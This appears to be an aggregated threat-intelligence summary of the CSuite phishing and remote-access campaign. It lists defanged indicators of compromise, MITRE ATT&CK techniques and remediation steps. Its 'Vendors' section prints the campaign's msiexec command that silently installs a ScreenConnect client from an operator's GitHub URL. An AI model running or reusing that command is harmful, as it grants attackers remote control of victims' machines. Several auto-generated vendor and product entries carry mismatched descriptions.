CSuite Campaign Uses Phishing, M365 Session Theft and Remote-Access Tools Against US and EU Organizations

Summary
ANY.RUN researchers detail CSuite, a campaign combining business-themed phishing, Microsoft 365 credential and session theft, device-code attacks, and legitimate remote-management tools to gain access to accounts and endpoints.
Key points
- The financially motivated operation was observed from February to September 3, 2026, targeting organizations in the US, Europe, and other regions. US organizations accounted for 60% of identified victim organizations.
- Lures impersonating services such as Adobe, DocuSign, Zoom, SharePoint, and Microsoft 365 delivered credential-harvesting pages, device-code flows, or scripts and installers.
- Device-code phishing directs victims to Microsoft's legitimate device-login page; entering the attacker-provided code authorizes an OAuth request and gives operators access and refresh tokens.
- The campaign also deploys legitimate remote- and endpoint-management agents, including ScreenConnect, Action1, Atera, Syncro, and PDQ Connect, to gain control of Windows devices.
- Some ScreenConnect installations register a credential provider and add an authentication package to LSA, enabling interactive-logon credential capture and persistence at boot.
- Researchers linked the campaign's phishing and remote-access activity through shared infrastructure, tooling, domains, and operator accounts; the report describes 38 domains in the panel registry.
- Defenders should investigate suspicious device-code sign-ins and Microsoft 365 sessions alongside unexpected management-agent installations; the report recommends revoking sessions and tokens, reviewing OAuth grants and mailbox rules, and removing unauthorized agents.
Article Details
- Attack Vectors
- Adobe Document Cloud invitations and other business-themed phishing messages direct victims to counterfeit document viewers, credential pages, or management-agent downloads.
- A redirector routes visitors to Microsoft, Google, or generic credential-capture flows based on the email address they enter.
- Device-code lures instruct victims to enter an attacker-initiated code on Microsoft's legitimate sign-in page, granting the operator access and refresh tokens.
- Batch and VBS droppers elevate privileges and install legitimate remote-management agents enrolled in operator-controlled tenants.
- The phishing kit filters automated visitors using browser, address, geographic, interaction, and reCAPTCHA checks.
- Defensive Notes
- Analyze suspicious links and files in an isolated environment before users interact with them.
- Correlate unexpected Microsoft 365 sessions and device-code authentication with new management-agent installations.
- If account compromise is suspected, revoke active sessions and tokens, review OAuth grants and mailbox rules, and investigate activity through the affected account.
- Remove unauthorized management agents and check affected endpoints for persistence.
- Pivot on recurring kit paths and lure patterns as well as current domains and addresses, because CSuite rotates infrastructure.
Indicators of compromise
| Type | Indicator | Context |
|---|---|---|
| DOMAIN | allshore-io[.]cam | Campaign lure host in the panel registry. |
| DOMAIN | ambitiousaboutautismorguk[.]com | Group-registered lookalike domain used for a credential-verification stage. |
| DOMAIN | arubanetworks-inc[.]com | Affiliate-operated host for document and meeting lures. |
| DOMAIN | aviationpioneers[.]info | Campaign redirector in the panel registry. |
| DOMAIN | cellumbio[.]com | Sending domain for the licensing-themed lure email. |
| DOMAIN | checkingweb[.]net | Counterfeit PDF viewer serving the licensing-themed batch dropper. |
| DOMAIN | conferenceuniverses[.]buzz | Host listed among the article's highest-value campaign indicators. |
| DOMAIN | corporate-sync-gate[.]net | Campaign redirect destination, including for Google-account visitors. |
| DOMAIN | coxnetwork[.]top | DocuSign-themed host serving the PHP phishing build. |
| DOMAIN | docseed[.]online | Campaign lure host in the panel registry. |
| DOMAIN | docseedn[.]online | Campaign lure host in the panel registry. |
| DOMAIN | docsendsr[.]online | Campaign lure host; an observed page used an Adobe-themed device-code flow. |
| DOMAIN | documentationreviewdocument2026review[.]sbs | Campaign redirector in the panel registry. |
| DOMAIN | documentensono[.]sbs | Observed voicemail-themed device-code phishing host. |
| DOMAIN | documentsonitustechnologies[.]sbs | Campaign redirector in the panel registry. |
| DOMAIN | docuread[.]im | DocuSign-themed host serving the PHP phishing build. |
| DOMAIN | downloaddocumentcontechbuilding[.]sbs | Campaign redirector in the panel registry. |
| DOMAIN | emsafetoproceedtaward[.]top | Campaign lure domain in the panel registry. |
| DOMAIN | escrowadmin[.]com[.]au | Compromised Australian site hosting a deployment of the credential-phishing kit. |
| DOMAIN | expressdocumentdelivery[.]org | Campaign lure host in the panel registry. |
| DOMAIN | fincapitalxcom[.]cfd | Campaign lure host in the panel registry. |
| DOMAIN | gddfzxa[.]online | Campaign lure pages and payload archives; also listed in the panel registry. |
| DOMAIN | giiro[.]net | Campaign lure host in the panel registry. |
| DOMAIN | greaterheights[.]sbs | Certificate-covered domain on the hosting used for operator lures and payloads. |
| DOMAIN | greenbullet[.]ba | Host fronting the account used for operator lure pages and payloads. |
| DOMAIN | keepsecurepasserword[.]cam | Campaign lure host in the panel registry. |
| DOMAIN | legacy-bridge-node[.]net | Post-capture redirect shared between two panels. |
| DOMAIN | localcontex[.]online | Host serving campaign management-agent installers. |
| DOMAIN | maillive[.]sbs | CSuite panel administration host and device-code landing page. |
| DOMAIN | mmswerod[.]sbs | Certificate-covered domain on the hosting used for operator lures and payloads. |
| DOMAIN | netcoxweb[.]top | DocuSign-themed host serving the PHP phishing build. |
| DOMAIN | pdfsecurtoview[.]cfd | Campaign redirector in the panel registry. |
| DOMAIN | pdfsecurtoview[.]info | Campaign redirector in the panel registry. |
| DOMAIN | pdfsecurtoview[.]sbs | Campaign redirector that routes visitors after they enter an email address. |
| DOMAIN | pdfsecurtoview365[.]cfd | Campaign redirector in the panel registry. |
| DOMAIN | pdfsecurtoview365[.]sbs | Campaign lure host and destination for redirected Microsoft-account visitors. |
| DOMAIN | pdfsecurtoviewothers[.]cfd | Domain assigned to the Chameleon credential harvester. |
| DOMAIN | pdfsecurtoviewothers[.]sbs | Domain assigned to the Chameleon credential harvester. |
| DOMAIN | pdfsecurtoviewsuite[.]sbs | Campaign lure host in the panel registry. |
| DOMAIN | pikecac[.]cfd | Campaign lure host in the panel registry. |
| DOMAIN | qrcoderuser[.]cfd | Campaign lure host in the panel registry. |
| DOMAIN | selectivelife01[.]sbs | Campaign lure host in the panel registry. |
| DOMAIN | selectivelife03[.]sbs | Observed SharePoint-themed device-code phishing host. |
| DOMAIN | sharepointer-dr[.]com | Affiliate-operated host for document and meeting lures. |
| DOMAIN | sharerpoint[.]cam | Campaign lure host in the panel registry. |
| DOMAIN | solarengyloanfunds[.]com | Group-registered lookalike domain used for a credential-verification stage. |
| DOMAIN | stubborn-academy[.]icu | Campaign address validator. |
| DOMAIN | usoffweb69[.]top | DocuSign-themed host serving the PHP phishing build. |
| DOMAIN | voicermailsmessager[.]cam | Campaign lure host in the panel registry. |
| DOMAIN | zerichoproject[.]org | Host listed among the article's highest-value campaign indicators. |
| HOSTNAME | doc[.]lauraice[.]xyz | DocuSign-themed host serving the PHP phishing build. |
| HOSTNAME | docusign[.]web-viewww[.]es | DocuSign-themed host serving the PHP phishing build. |
| HOSTNAME | file[.]shared[.]cnrv[.]tech | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | file[.]shared[.]m36s[.]site | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | file[.]shared[.]myscript[.]sbs | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | ghs[.]coorpes[.]com | Certificate-covered hostname on the hosting used for operator lures and payloads. |
| HOSTNAME | instance-t7o41i-relay[.]screenconnect[.]com | ScreenConnect relay bound to a client used for remote control. |
| HOSTNAME | loq[.]file[.]cnrv[.]online | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | m36nx[.]file[.]cnrv[.]online | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | mail[.]boratlongyear[.]com | Campaign lure-mail sending relay. |
| HOSTNAME | mail[.]wirsann[.]com | Campaign lure-mail sending relay. |
| HOSTNAME | shared[.]file[.]cnrv[.]tech | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | shared[.]file[.]nn365[.]cloud | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | shared[.]note[.]nn365[.]cloud | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | sqrd[.]m365[.]sharedfile[.]online | Microsoft 365 document lure host identified in campaign indicators. |
| HOSTNAME | sqrd[.]m36s[.]sharedfile[.]tech | Microsoft 365 document lure host identified in campaign indicators. |
| IPV4 | 102[.]67[.]5[.]132 | Address identified as an operator address. |
| IPV4 | 102[.]88[.]167[.]38 | Address identified as an operator address. |
| IPV4 | 141[.]133[.]174[.]208 | Campaign lure-mail sending relay address. |
| IPV4 | 155[.]254[.]26[.]180 | Self-hosted ScreenConnect relay used by a staged installer; the indicator list specifies port 8041. |
| IPV4 | 185[.]174[.]102[.]34 | GSuite panel address. |
| IPV4 | 188[.]127[.]227[.]18 | Campaign lure-mail sending relay address. |
| IPV4 | 190[.]123[.]46[.]122 | Kit origin server. |
| IPV4 | 191[.]101[.]130[.]42 | Address identified as an operator address. |
| IPV4 | 207[.]189[.]19[.]40 | Remote-desktop foothold used for operator work; the article specifies port 26688. |
| IPV4 | 212[.]189[.]40[.]73 | Self-hosted ScreenConnect relay used by a staged installer; the indicator list specifies port 8041. |
| IPV4 | 31[.]57[.]147[.]133 | Address identified as an operator address. |
| IPV4 | 31[.]57[.]38[.]60 | Address identified as an operator address. |
| IPV4 | 64[.]204[.]180[.]203 | Self-hosted ScreenConnect server used by a batch dropper; the article specifies port 8040. |
| IPV4 | 91[.]92[.]41[.]114 | Self-hosted ScreenConnect relay used by staged installers; the article specifies port 8041. |
| SHA256 | 07682ca34a9bf18beb664088e55035a83306b95b31d4aaba242e9d67f8c378a3 | Campaign lure page A, index.html. |
| SHA256 | 0d6b451bd58b904e7dd15ce3e28ea129f7f95c9d248944fbdacdf6fb1d2adc99 | PHP-build settings.php reporting configuration. |
| SHA256 | 2b89225801591cd223e0cf0b1faa8e7b12e88d6b6bc6ec9f5e715171137553ac | PHP-build e-sign.php download page. |
| SHA256 | 375e49680fe4b4a62320bdcfd16b7bd75f6223a15d620c475c6988803b67d416 | PHP-build index.php visitor-reporting and redirect component. |
| SHA256 | 38ba6bfe0cc2b7c5ff38f1f698e2c9bfdb52dd7937111967fddf785ba001e1f2 | Amended_Agreement02026.vbs campaign dropper. |
| SHA256 | 394d7be5ecbe326062c1de1fb674bdcbb4dbe3ce03b4227994607047b832debd | m/js/fingerprint.js browser-fingerprinting module. |
| SHA256 | 3a8daf4e992ea34b71b259af85d4d12ca52d80b9e2b262bd5aa5922a5a955f9f | Rebuilt lure page A serving a management agent. |
| SHA256 | 41734f8e6cc75b66f51638b76780f61a0b21ad9f77586e2665b7ab8d7e131936 | Adobe-themed Hexnode management-agent installer. |
| SHA256 | 463786717f51b710dbbb013437141e416b98d810dfaa9f4de90a4c4939bc66b9 | Syncro agent distributed under Adobe and Dotloop filenames. |
| SHA256 | 6f62a8380eb5038e253772033c0ebc1ddb951a042c4a1a90ba8755819dc74e53 | Adobe.ClientSetup.msi staged client configured for relay 155.254.26[.]180. |
| SHA256 | 74e306072561731adf55afd4de461ec0736ca22c0b458a78e7512b2701341f28 | m/js/captcha.js challenge and verification module. |
| SHA256 | 7b03111fa24ce01054332f013b3fe8189d2b61897e7306666c73b086588a64a5 | PHP-build download.php payload-delivery component. |
| SHA256 | 842f0236ea2c2b7773054920e7a870e07869c4e99f84bd31ccfd215781b4f267 | Substituted msvcp140.dll used with the loader. |
| SHA256 | 90f8e6259ce27592c460d235aff104d7507dfff4e7889c34ab714cdb19944473 | Adobe Installer V3572.bat dropper for an Action1 agent. |
| SHA256 | 9a03a0b65b2a2d27b348e583237d512a55f3f8287989abf7ffca0285d5f8e43d | Q4_Report062.zip payload archive B. |
| SHA256 | a450a84a60ce6646596feb2d6bea4c89a1b5b4e7d6325d5b7c2000982987411c | Updated Service Agreement 2026.bat dropper for a ScreenConnect client. |
| SHA256 | a89a31ec605c0ed9cd263cbdea6ee4a2c6502ec81e5b3e8a3c9fb3de945405f9 | SSAStatement.exe, the renamed Adobe loader in a campaign payload. |
| SHA256 | aac51e4016c50a705a26bd56435f0fd9685e53d6bc0cc6034b7370e76d7cb376 | Staged ScreenConnect client configured for relay 91.92.41[.]114. |
| SHA256 | ae7af8159f06a059411411e5e816b415e32213371fb085ced1dc5679a0112c48 | AdobePdf_Reader.zip payload archive A. |
| SHA256 | aefd71902453cc83104aa963d8d9051c875d93ddf40680616e8fa5e68565ea69 | Staged ScreenConnect client configured for relay 212.189.40[.]73. |
| SHA256 | b1e55c9679f9aca94d66fdb08195cf8752f69f1d6896a5b2e60d979fca5a4036 | Update_6779.bat dropper for a ScreenConnect client. |
| SHA256 | b59e7cb539c0b81a58f60d5ca0ed3df62d1856b29076720efbb7dd9411d99eec | ScreenConnect.ClientSetup.msi remote-management client delivered by the operation. |
| SHA256 | c0eb04dcfa745653c466c34978a1f3b4e5041f526be8c2e46b8c722498ca746a | Shared m/js/utils.js phishing gate. |
| SHA256 | c5f7083722fc5bee4e7a7109495348d3731e6b077919a6b679b9f5af885923cd | Verification gate from a complete kit deployment. |
| SHA256 | d995ea6f1621c29cdd4353cfb8b36cd1336b34bc8b180b73ce52cd939060bf0f | Action1 agent distributed under Adobe and Dotloop filenames. |
| SHA256 | e769b2b4463e7d39320b65a49183ce4ff8c20459fa183e7b03f02e1b44420eb0 | Campaign lure page B, Adobe.html. |
| SHA256 | eb9274a1fb6064e784f9c0ce95c78007efcadc279d4ffcac13998a45ebf7b49f | DocuSign-themed Hexnode management-agent installer. |
| SHA256 | fd98c6881cadc47e7d425bbd4b992237a832e69fdfe872a90ba567ed58a148ad | Served Chameleon credential page. |
| SHA256 | fdd171cc26704218b0762a33650c0d1246c42cbe583a858684e1b6ac12b9bbe7 | PHP-build eDocusign.php blurred-document decoy. |
| URL | hxxps[:]//app[.]action1[.]com/agent/5c2cda44-433f-11f1-9ef8-332f425c6d9a/Windows/agent(My_Organization)[.]msi | Specific agent package in an operator-controlled Action1 tenant fetched by a dropper. |
| URL | hxxps[:]//github[.]com/Ivan3900/test/raw/main/ScreenConnect[.]ClientSetup[.]msi | Specific GitHub-hosted ScreenConnect installer fetched by a campaign batch dropper. |
| URL | hxxps[:]//localcontex[.]online/AdobecloudReader/pdf_Reader_en_install[.]msi | Management-agent payload delivery URL. |
| URL | hxxps[:]//localcontex[.]online/review[.]signal-doc[.]cloud/[.]DocuSign/ | Campaign delivery path for the DocuSign-themed kit. |
MITRE ATT&CK
T1036.005 · Match Legitimate Resource Name or LocationSSAStatement.exe used an Adobe-themed name to appear to be a financial statement.T1056.003 · Web Portal CaptureThe Chameleon credential page collected a victim's password through a counterfeit portal.T1059.001 · PowerShellDroppers used PowerShell to relaunch with elevation and download agent packages.T1059.003 · Windows Command ShellBatch droppers checked administrative rights and launched agent installation.T1090.003 · Multi-hop ProxyCloudflare workers.dev reverse proxies concealed lure-domain origins.T1105 · Ingress Tool TransferDroppers fetched agent packages from an operator-controlled Action1 tenant and staged download locations.T1114.002 · Remote Email CollectionThe operator used a remote-desktop host to access captured mailboxes manually.T1189 · Drive-by CompromiseOn Adobe-themed pages, a synthetic click started a payload download when the page loaded.T1204.002 · Malicious FileCounterfeit viewer instructions prompted victims to open downloaded scripts or installers.T1218.007 · MsiexecA batch dropper passed a remote ScreenConnect MSI URL to msiexec for quiet installation.T1219 · Remote Access ToolsOperator-enrolled ScreenConnect and other legitimate management agents provided remote endpoint access.T1480 · Execution GuardrailsAddress, fingerprint, and country filters restricted who could reach phishing pages.T1497 · Virtualization/Sandbox EvasionThe kit checked for automation and scanners and used a timed resource-exhaustion trap against analysis.T1539 · Steal Web Session CookieThe panel's per-domain capture modes took authenticated Microsoft 365 sessions.T1547.002 · Authentication PackageA ScreenConnect authentication package was appended to LSA to load at boot.T1553.002 · Code SigningThe article reports use of a valid Adobe DigiCert signature on the loader to pass signature and reputation checks.T1556 · Modify Authentication ProcessA registered ScreenConnect credential provider exposed interactive logons to the operator.T1566.002 · Spearphishing LinkAdobe Document Cloud share invitations from hijacked tenants carried phishing links.T1567 · Exfiltration Over Web ServiceLure pages reported visitor details through a messaging bot API.T1574.001 · DLLSSAStatement.exe loaded a substituted msvcp140.dll from its directory to execute attacker code.T1583.001 · DomainsThe operation used registered lure, redirector, harvester, and lookalike domains.T1583.004 · ServerA shared-hosting account held lure pages and payload archives.T1584.004 · ServerThe article reports compromised legitimate websites serving the lure kit.T1585.003 · Cloud AccountsTwo Cloudflare accounts with connected API keys fronted and automated operation domains.T1608.001 · Upload MalwarePayload archives were staged on shared hosting and agent installers in a public code-hosting account.T1621 · Multi-Factor Authentication Request GenerationDevice-code pages led victims to approve an attacker-initiated authentication request.T1656 · ImpersonationThe Chameleon page used logos and a website screenshot to impersonate the target organization's portal.
Vendors
Action1One delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.AteraOne delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.CloudflareHijacked Adobe Document Cloud tenants, Cloudflare Workers, public code hosting, and legitimate management tools help the operation blend malicious activity with normal business infrastructure.ConnectWiseThe tag row on the pivot query reads as a product catalogue on its own: screenconnect, connectwise, datto, action1, logmeinrescue, fleetdeck, simplehelp and ultravnc.GitHubmsiexec /i "https://github.com/Ivan3900/test/raw/main/ScreenConnect.ClientSetup.msi" /quiet /norestartHexnodeHexnode management agent, 190 MB, Adobe theme MicrosoftANY.RUN researchers investigated CSuite, a phishing and remote-access operation that combines credential theft, Microsoft 365 session hijacking, and the abuse of legitimate management tools.SyncroOne delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.
Products
Action1One delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.Adobe Document CloudHijacked Adobe Document Cloud tenants, Cloudflare Workers, public code hosting, and legitimate management tools help the operation blend malicious activity with normal business infrastructure.AteraOne delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.Cloudflare R2Delivery telemetry adds a fifth vendor: PDQConnectAgent_ZoomUpdater.msi, served 46 times from a Cloudflare R2 bucket alongside Zoom_InstallerX64.zip.Cloudflare WorkersHijacked Adobe Document Cloud tenants, Cloudflare Workers, public code hosting, and legitimate management tools help the operation blend malicious activity with normal business infrastructure.HexnodeHexnode management agent, 190 MB, Adobe theme Microsoft 365ANY.RUN researchers investigated CSuite, a phishing and remote-access operation that combines credential theft, Microsoft 365 session hijacking, and the abuse of legitimate management tools.PDQ ConnectOne delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.ScreenConnectOne delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.SyncroOne delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect.
Tools
ANY.RUN Interactive SandboxANY.RUN Threat Intelligence FeedsANY.RUN Threat Intelligence Feeds can deliver current malicious domains, IPs, URLs, and other IOCs into SIEM, EDR, firewalls, and other security tools.ANY.RUN Threat Intelligence LookupANY.RUN Threat Intelligence Lookup lets analysts pivot from domains, IPs, URLs, files, and recurring paths to connected infrastructure.
Countries
AustraliaActivity was also observed in the Philippines, Australia, the United Kingdom, Canada, and 29 other countries.CanadaActivity was also observed in the Philippines, Australia, the United Kingdom, Canada, and 29 other countries.IndiaThe United States accounted for 51% of related sandbox submissions, followed by India at 18%.PhilippinesActivity was also observed in the Philippines, Australia, the United Kingdom, Canada, and 29 other countries.United KingdomActivity was also observed in the Philippines, Australia, the United Kingdom, Canada, and 29 other countries.United StatesThe campaign showed a strong US focus, with 51% of sessions from the United States.
Industries
ConsultingTechnology firms, government and administration, consulting, manufacturing, education and mortgage licensees, concentrated in the United States EducationTechnology firms, government and administration, consulting, manufacturing, education and mortgage licensees, concentrated in the United States GovernmentTechnology firms, government and administration, consulting, manufacturing, education and mortgage licensees, concentrated in the United States ManufacturingTechnology firms, government and administration, consulting, manufacturing, education and mortgage licensees, concentrated in the United States Mortgage LendingTechnologyTechnology firms, government and administration, consulting, manufacturing, education and mortgage licensees, concentrated in the United States